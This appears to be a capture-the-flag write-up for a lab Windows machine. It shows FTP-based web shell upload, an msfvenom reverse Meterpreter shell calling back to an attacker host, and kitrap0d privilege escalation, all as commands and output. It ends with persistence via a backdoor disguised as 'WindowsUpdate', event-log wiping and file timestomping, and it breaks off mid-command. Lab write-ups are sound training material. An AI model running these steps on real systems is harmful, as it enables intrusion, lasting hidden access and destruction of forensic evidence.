Machine Synopsis#
IP Address: 10.10.10.5
Key Exploitation Techniques:
- Anonymous FTP Write Access: Exploiting an insecure FTP configuration to upload a web shell.
- ASPX Web Shell: Deploying a web shell to gain initial access.
- Windows Kernel Privilege Escalation: Using the
kitrap0dexploit (MS10-015) to escalate from a low-privileged user toSYSTEM.
1. Enumeration#
Initial reconnaissance with nmap revealed two open ports.
nmap -p 21,80 -sC -sV 10.10.10.5
Nmap Results:#
- Port 21 (FTP):
Microsoft ftpd. The scan results show that Anonymous login is allowed and that the server is running onWindows_NT. The FTP root directory contains web files likeiisstart.htm, which suggests it is the same as the web root. - Port 80 (HTTP):
Microsoft IIS httpd 7.5.
A manual check of the anonymous FTP access confirmed that we could not only read files but also upload and overwrite files, a critical finding.
ftp 10.10.10.5
# Login with 'anonymous' and any password.
ftp> put test.txt
# Upload successful.
This confirmed that the FTP directory is a writable web root.
2. Exploitation#
Step 2.1: Deploying a Web Shell#
The goal is to upload a malicious file (a web shell) that can be executed by the web server. Since the server is running IIS, the appropriate file type is an .aspx web shell.
Using msfvenom, we generated an ASPX payload for a reverse Meterpreter shell.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.2 LPORT=4444 -f aspx -o shell.aspx
Next, we uploaded the generated shell.aspx file to the server using the anonymous FTP connection.
ftp 10.10.10.5
ftp> put shell.aspx
Step 2.2: Gaining Initial Access#
We set up a multi-handler in Metasploit to listen for the incoming Meterpreter shell connection.
msfconsole -q
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 10.10.14.2
msf6 exploit(multi/handler) > set LPORT 4444
msf6 exploit(multi/handler) > exploit
To trigger the shell, we accessed the uploaded file via a web browser or curl.
curl http://10.10.10.5/shell.aspx
This executed the payload on the server, and a Meterpreter session was established. The getuid command confirmed we were running as iis apppool\defaultapppool. The user.txt flag was found on the babis user’s desktop.
meterpreter > getuid
Server username: IIS APPPOOL\DefaultAppPool
meterpreter > shell
C:\Users\babis\Desktop> type user.txt
9ecdd6a3aedf24b41562fea70f4cb3e8
3. Privilege Escalation#
Our initial shell was a low-privileged account. The next step was to escalate to NT AUTHORITY\SYSTEM.
Step 3.1: Information Gathering#
The systeminfo command provided crucial details: the OS is Windows 7 Enterprise (x86) with no hotfixes installed. This immediately points to several well-known and unpatched kernel vulnerabilities.
C:\Windows\system32> systeminfo
Host Name: DEVEL
OS Name: Microsoft Windows 7 Enterprise
OS Version: 6.1.7600 N/A Build 7600
System Type: X86-based PC
Hotfix(s): N/A
Step 3.2: Local Exploit Suggester#
The Metasploit local_exploit_suggester module can automatically identify potential privilege escalation exploits based on the system’s configuration.
meterpreter > run post/multi/recon/local_exploit_suggester
The suggester identified several likely candidates, including the ms10_015_kitrap0d exploit, which is a kernel vulnerability that allows for privilege escalation on unpatched Windows 7 systems.
Step 3.3: Exploiting with ms10_015_kitrap0d#
We backgrounded the current Meterpreter session and launched the ms10_015_kitrap0d exploit module.
meterpreter > background
msf6 > use exploit/windows/local/ms10_015_kitrap0d
msf6 exploit(windows/local/ms10_015_kitrap0d) > set SESSION 1
msf6 exploit(windows/local/ms10_015_kitrap0d) > set LHOST 10.10.14.2
msf6 exploit(windows/local/ms10_015_kitrap0d) > exploit
The exploit successfully ran and created a new, privileged Meterpreter session. The getuid command confirmed NT AUTHORITY\SYSTEM privileges. The root.txt flag was found on the Administrator user’s desktop.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > shell
C:\Users\Administrator\Desktop> type root.txt
<redacted>
4. Alternative Exploitation Methods#
- Simple Web Shell: Instead of a complex Meterpreter payload, a basic ASP.NET command shell could be used for initial access.
- Powershell Reverse Shell: An ASPX wrapper could be used to execute a PowerShell reverse shell, which can be an effective alternative to a Meterpreter payload.
5. Post-Exploitation and Defense Evasion#
Once a SYSTEM shell is obtained, these steps are crucial for maintaining access and covering tracks.
A. Persistence#
Registry Key: Add a key to the
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Runregistry path to execute a payload on system startup.C:\Windows\system32> reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdate" /t REG_SZ /d "C:\Windows\System32\backdoor.exe"Scheduled Task: Create a new scheduled task that runs on system startup, ensuring a persistent presence.
C:\Windows\system32> schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\System32\backdoor.exe" /sc onstart /ru SYSTEMService Installation: Create a new service that starts automatically at boot with
sc.exe.C:\Windows\system32> sc create "WindowsUpdate" binpath= "C:\Windows\System32\backdoor.exe" start= auto
B. Defense Evasion#
Log Cleanup: Clear all Windows Event Logs and IIS logs to remove evidence of the intrusion.
C:\Windows\system32> for /f "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1" C:\Windows\system32> del "C:\inetpub\logs\LogFiles\W3SVC1\*.log"File Attribute Manipulation: Hide the backdoor file and modify its timestamps to match a benign system file.
C:\Windows\system32> attrib +h +s +r C:\Windows\System32\backdoor.exe C:\Windows\system32> powershell "(Get-Item C:\Windows\System32\backdoor.exe).LastWriteTime = (Get-Item